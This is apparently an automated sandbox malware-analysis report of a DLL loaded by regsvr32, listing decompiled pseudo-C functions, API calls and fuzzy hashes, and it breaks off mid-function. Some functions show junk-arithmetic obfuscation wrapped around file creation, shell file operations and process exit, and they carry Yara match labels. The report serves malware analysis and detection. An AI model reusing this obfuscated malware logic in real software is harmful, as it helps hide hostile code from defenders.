lstrlenA.KERNEL32(?,?), ref: 10036A39

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: b6415bc7fb54122927725ccb61bd61b9948e263e3548aa1c56e554d3885b53e3
Instruction ID: e34cfbd9f68cfc7d4995301b1a62607e046a2d30ea58e6d7380a124c88182d30
Opcode Fuzzy Hash: b6415bc7fb54122927725ccb61bd61b9948e263e3548aa1c56e554d3885b53e3
Instruction Fuzzy Hash: 86414D36D0021AEFCF02DFA8C98499DBBB5EF09255F11806AE915BB211DB31AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10066472 Relevance: 5.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10066472(intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				int _t38;

				_t32 = _a8;
				if(_t32 != 0) {
					_push(_t29);
					_t35 = _a4;
					E1001ACB0(_t29, _t35, _t32, 0x2c);
					E1001ACB0(_t29, _t35 + 0x34, _t32 + 0x30, 5);
					_t38 = 1;
					MultiByteToWideChar(0, 0, _t32 + 0x2c, _t38, _t35 + 0x2c, _t38);
					MultiByteToWideChar(0, 0, _t32 + 0x2d, _t38, _t35 + 0x2e, _t38);
					MultiByteToWideChar(0, 0, _t32 + 0x2e, _t38, _t35 + 0x30, _t38);
					MultiByteToWideChar(0, 0, _t32 + 0x2f, _t38, _t35 + 0x32, _t38);
					return _t35;
				}
				return 0;
			}

0x10066473
0x10066479
0x1006647f
0x10066482
0x1006648a
0x10066499
0x100664ac
0x100664b8
0x100664c8
0x100664d8
0x100664e8
0x00000000
0x100664ee
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 100664B8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 100664C8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 100664D8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000001), ref: 100664E8

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 67ecc3c17ed83a44c4994e88d2d58522e32277762bffeaf6d74d2f49ce67c4ce
Instruction ID: 52da320b43b0769751a06dc02482e5692de24fb38941f05d193264ad304989f4
Opcode Fuzzy Hash: 67ecc3c17ed83a44c4994e88d2d58522e32277762bffeaf6d74d2f49ce67c4ce
Instruction Fuzzy Hash: FA119E732846097BE260D695CC82F97B7ACFB4EB94F120517F309DA880E662F50447B0

Uniqueness

Uniqueness Score: -1.00%

Function 100654EF Relevance: 5.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E100654EF(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t29;
				intOrPtr _t32;
				long* _t37;
				intOrPtr* _t42;
				signed int _t45;
				struct _CRITICAL_SECTION* _t46;
				intOrPtr* _t49;

				_push(__ecx);
				_t49 = _a4;
				_t37 = __ecx;
				_t45 = 1;
				_v8 = _t45;
				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
					L10:
					_t46 =  &(_t37[7]);
					EnterCriticalSection(_t46);
					E10065128( &(_t37[5]), _t49);
					LeaveCriticalSection(_t46);
					LocalFree( *(_t49 + 0xc));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49))(1);
					}
					_t29 = TlsSetValue( *_t37, 0);
					L13:
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
						if(_t42 != 0) {
							 *((intOrPtr*)( *_t42))(1);
						}
						_t29 =  *(_t49 + 0xc);
						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
					} else {
						_t29 =  *(_t49 + 0xc);
						if( *(_t29 + _t45 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t45 = _t45 + 1;
				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
				if(_v8 == 0) {
					goto L13;
				}
				goto L10;
			}

0x100654f2
0x100654f5
0x100654fb
0x100654fd
0x10065501
0x10065504
0x10065548
0x10065548
0x1006554c
0x10065556
0x1006555c
0x10065565
0x1006556d
0x10065575
0x10065575
0x1006557b
0x10065581
0x10065585
0x00000000
0x00000000
0x00000000
0x10065506
0x10065506
0x10065506
0x1006550b
0x10065528
0x1006552d
0x10065533
0x10065533
0x10065535
0x10065538
0x10065516
0x10065516
0x1006551d
0x1006551f
0x1006551f
0x1006551d
0x1006553c
0x1006553d
0x10065546
0x00000000
0x00000000
0x00000000

APIs

EnterCriticalSection.KERNEL32(?), ref: 1006554C
LeaveCriticalSection.KERNEL32(?,?), ref: 1006555C
LocalFree.KERNEL32(?), ref: 10065565
TlsSetValue.KERNEL32(?,00000000), ref: 1006557B

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 2431943b2b3547c10198ad4ee0cff328af9896bfc6bf8ffbc0d1d39c13ddf1b2
Instruction ID: e070ee2dd4cb785804ffe617cc4151b324c71f9e2f47cc507a40a890c5ea1161
Opcode Fuzzy Hash: 2431943b2b3547c10198ad4ee0cff328af9896bfc6bf8ffbc0d1d39c13ddf1b2
Instruction Fuzzy Hash: 4F218931200611EFDB14CF44D899B6A77F6FF85792F008069E5178B1A1C772E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10064CD8 Relevance: 5.0, APIs: 4, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10064CD8(signed int _a4) {
				void* _t14;
				struct _CRITICAL_SECTION* _t16;
				signed int _t22;
				intOrPtr* _t25;
				intOrPtr _t30;
				intOrPtr _t31;

				_t30 =  *0x10094b14; // 0x1
				if(_t30 == 0) {
					_t14 = E10064C45();
				}
				_t31 =  *0x10094b10; // 0x0
				if(_t31 == 0) {
					_t22 = _a4;
					_t25 = 0x1009491c + _t22 * 4;
					if( *((intOrPtr*)(0x1009491c + _t22 * 4)) == 0) {
						EnterCriticalSection(0x10094960);
						if( *_t25 == 0) {
							InitializeCriticalSection(0x10094978 + (_t22 + _t22 * 2) * 8);
							 *_t25 =  *_t25 + 1;
						}
						LeaveCriticalSection(0x10094960);
					}
					_t16 = 0x10094978 + (_t22 + _t22 * 2) * 8;
					EnterCriticalSection(_t16);
					return _t16;
				}
				return _t14;
			}

0x10064cdb
0x10064ce1
0x10064ce3
0x10064ce3
0x10064ce8
0x10064cee
0x10064cf2
0x10064d03
0x10064d0a
0x10064d13
0x10064d18
0x10064d25
0x10064d2b
0x10064d2b
0x10064d2e
0x10064d34
0x10064d38
0x10064d40
0x00000000
0x10064d43
0x10064d45

APIs

EnterCriticalSection.KERNEL32(10094960,?,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6), ref: 10064D13
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6), ref: 10064D25
LeaveCriticalSection.KERNEL32(10094960,?,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6), ref: 10064D2E
EnterCriticalSection.KERNEL32(00000000,00000000,?,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6,10041F16), ref: 10064D40

Part of subcall function 10064C45: GetVersion.KERNEL32(?,10064CE8,00000100,100656C4,00000010,?,?,00000100,?,?,10064BB0,10064BFD,10062AFA,10064BB6,10041F16), ref: 10064C58

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 99d5eaf97519d11724582922211537668031b6b19fe6782f300d66c24dd86514
Instruction ID: 725b0e70258a1a049639792faad373a38aa31ce05ffc7c597b01903f60b9003e
Opcode Fuzzy Hash: 99d5eaf97519d11724582922211537668031b6b19fe6782f300d66c24dd86514
Instruction Fuzzy Hash: A0F0373550522BEFE704DF98DCD4E42B3AEFB4821AB430427E64992021DF31A559CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001F30B Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F30B(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x10090d54);
				InitializeCriticalSection( *0x10090d44);
				InitializeCriticalSection( *0x10090d34);
				InitializeCriticalSection( *0x10090d14);
				return _t1;
			}

0x1001f30b
0x1001f318
0x1001f320
0x1001f328
0x1001f330
0x1001f333

APIs

InitializeCriticalSection.KERNEL32(?,1001E9D2,?,1001A88E), ref: 1001F318
InitializeCriticalSection.KERNEL32 ref: 1001F320
InitializeCriticalSection.KERNEL32 ref: 1001F328
InitializeCriticalSection.KERNEL32 ref: 1001F330

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: f7ae5460dd4188a292840e013db1b95732b1ef095e52d85f0e3581adac530f0d
Instruction ID: 2657dd312fd81831430e233a2daabd66c3d927ca760eefe11eccd878c0657f32
Opcode Fuzzy Hash: f7ae5460dd4188a292840e013db1b95732b1ef095e52d85f0e3581adac530f0d
Instruction Fuzzy Hash: A4C00231806038AEEE5AABA5EE8684A3F26FF452A53010063F50C52074CA363C60EFD2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 2140, Parent PID: 468COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	374
Total number of Limit Nodes:	13

Executed Functions

Function 00239A53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00239A53(long __ecx, void* __edx, WCHAR* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a28, long _a32, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t59;
				void* _t71;
				signed int _t73;
				signed int _t74;
				signed int _t75;
				long _t85;

				_push(_a44);
				_t85 = __ecx;
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00232528(_t59);
				_v28 = 0xef6a1;
				_v24 = 0xe631;
				_v20 = 0x7a329;
				_v16 = 0xa016b8;
				_t73 = 0x60;
				_v16 = _v16 / _t73;
				_t74 = 0x3a;
				_v16 = _v16 / _t74;
				_v16 = _v16 + 0xffff6e82;
				_v16 = _v16 ^ 0xfff3db86;
				_v12 = 0xbda2be;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xffffa315;
				_v12 = _v12 + 0xffff64e8;
				_v12 = _v12 ^ 0x00128468;
				_v8 = 0x213d2c;
				_v8 = _v8 + 0xffff612c;
				_v8 = _v8 ^ 0x25eea302;
				_t75 = 0x49;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x0086bb13;
				E00236F64(0xa971fe6d, _t75, _t75, 0xbfd2d08a, 0x13d);
				_t71 = CreateFileW(_a4, _t85, _a16, 0, _a8, _a32, 0); // executed
				return _t71;
			}

0x00239a5b
0x00239a60
0x00239a62
0x00239a65
0x00239a66
0x00239a69
0x00239a6c
0x00239a6d
0x00239a70
0x00239a73
0x00239a76
0x00239a79
0x00239a7d
0x00239a7e
0x00239a83
0x00239a8d
0x00239a96
0x00239a9d
0x00239aa9
0x00239aae
0x00239ab6
0x00239abb
0x00239ac0
0x00239ac7
0x00239ace
0x00239ad5
0x00239ad9
0x00239ae0
0x00239ae7
0x00239aee
0x00239af5
0x00239afc
0x00239b06
0x00239b0e
0x00239b11
0x00239b2d
0x00239b44
0x00239b4b

APIs

CreateFileW.KERNEL32(00128468,?,0000E631,00000000,FFF3DB86,?,00000000), ref: 00239B44

Strings

,=!, xrefs: 00239AEE

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: ,=!
API String ID: 823142352-3902226038
Opcode ID: db60e815c13fa30db4f4f92ee864ea71fe6f1c9fccfb7085071fbef99af59582
Instruction ID: c4b2b0a594b707dd78758fd8d7993e296b1852ea2ece16f1b9d7ad392a609576
Opcode Fuzzy Hash: db60e815c13fa30db4f4f92ee864ea71fe6f1c9fccfb7085071fbef99af59582
Instruction Fuzzy Hash: C6312472D00208FFDF15CFA6DC498DEBBB6EB89314F108189F91466160D7B29A259F90

Uniqueness

Uniqueness Score: -1.00%

Function 00233182 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00233182(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t40;
				int _t48;
				signed int _t50;
				struct _SHFILEOPSTRUCTW* _t55;

				_push(_a8);
				_t55 = __edx;
				_push(_a4);
				_push(__edx);
				E00232528(_t40);
				_v20 = _v20 & 0x00000000;
				_v32 = 0x8d7e;
				_v28 = 0xd5018;
				_v24 = 0x83984;
				_v16 = 0x378328;
				_t50 = 0x6f;
				_v16 = _v16 / _t50;
				_v16 = _v16 + 0xfffffb56;
				_v16 = _v16 ^ 0x000c4e61;
				_v12 = 0x181ca0;
				_v12 = _v12 + 0x8cdf;
				_v12 = _v12 + 0x769a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x920510f8;
				_v8 = 0xfa7ef3;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0x11ff;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x01f94c60;
				E00236F64(0x3936eb73, _t50, _t50, 0xfd28539d, 0x2ac);
				_t48 = SHFileOperationW(_t55); // executed
				return _t48;
			}

0x00233189
0x0023318c
0x0023318e
0x00233191
0x00233193
0x00233198
0x0023319f
0x002331a8
0x002331af
0x002331b6
0x002331c2
0x002331ca
0x002331cd
0x002331d4
0x002331db
0x002331e2
0x002331e9
0x002331f0
0x002331f4
0x002331fb
0x00233202
0x00233206
0x0023320d
0x00233211
0x0023322d
0x00233236
0x0023323c

APIs

SHFileOperationW.SHELL32 ref: 00233236

Strings

s69, xrefs: 00233228

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: s69
API String ID: 3080627654-3363742768
Opcode ID: 700f7503ae571a097b6598476fe53e4c2e283806177926624582366c2e511042
Instruction ID: bfdc4ee27166cf2069f6e2826d1cccc0f6c50421dc6936afa40d49cf57dd9992
Opcode Fuzzy Hash: 700f7503ae571a097b6598476fe53e4c2e283806177926624582366c2e511042
Instruction Fuzzy Hash: 141132B6D10708BBEB05EFD5D84A8DEBBB4EB51718F108088E42466281E7B90B189F90

Uniqueness

Uniqueness Score: -1.00%

Function 0023FE66 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0023FE66() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t39;

				_v16 = 0xccf88;
				_v16 = 0x2b5d47;
				_t39 = 0x3f;
				_v16 = _v16 * 0x1b;
				_v16 = _v16 ^ 0x0490d732;
				_v12 = 0x8a9628;
				_v12 = _v12 / _t39;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x000e1985;
				_v8 = 0x12da78;
				_v8 = _v8 ^ 0xc30f85a0;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x192cbcc7;
				_v8 = _v8 ^ 0x192bc050;
				E00236F64(0x96ef5de3, _t39, _t39, 0xbfd2d08a, 0x39);
				ExitProcess(0);
			}

0x0023fe6c
0x0023fe75
0x0023fe82
0x0023fe8a
0x0023fe8d
0x0023fe94
0x0023fea1
0x0023fea4
0x0023fea8
0x0023feac
0x0023feb3
0x0023feba
0x0023fec1
0x0023fec5
0x0023fecc
0x0023fee2
0x0023feec

APIs

ExitProcess.KERNEL32(00000000), ref: 0023FEEC

Strings

G]+, xrefs: 0023FE75

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: G]+
API String ID: 621844428-691902478
Opcode ID: e94481b05225a65ba98a4b16e923cea43d716156dc330be998a462f41dc0e36d
Instruction ID: 202247e41d855c25f0d072919ce5d60bb228f555b3e1a485193f27bb3b99efa7
Opcode Fuzzy Hash: e94481b05225a65ba98a4b16e923cea43d716156dc330be998a462f41dc0e36d
Instruction Fuzzy Hash: 18012570D01208FFDB08DFE9D94AA9DBBB4EB50304F60C088E416AB291D7B11B199F40

Uniqueness

Uniqueness Score: -1.00%

Function 00244FB8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00244FB8(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t26;
				int _t33;
				void* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__ecx);
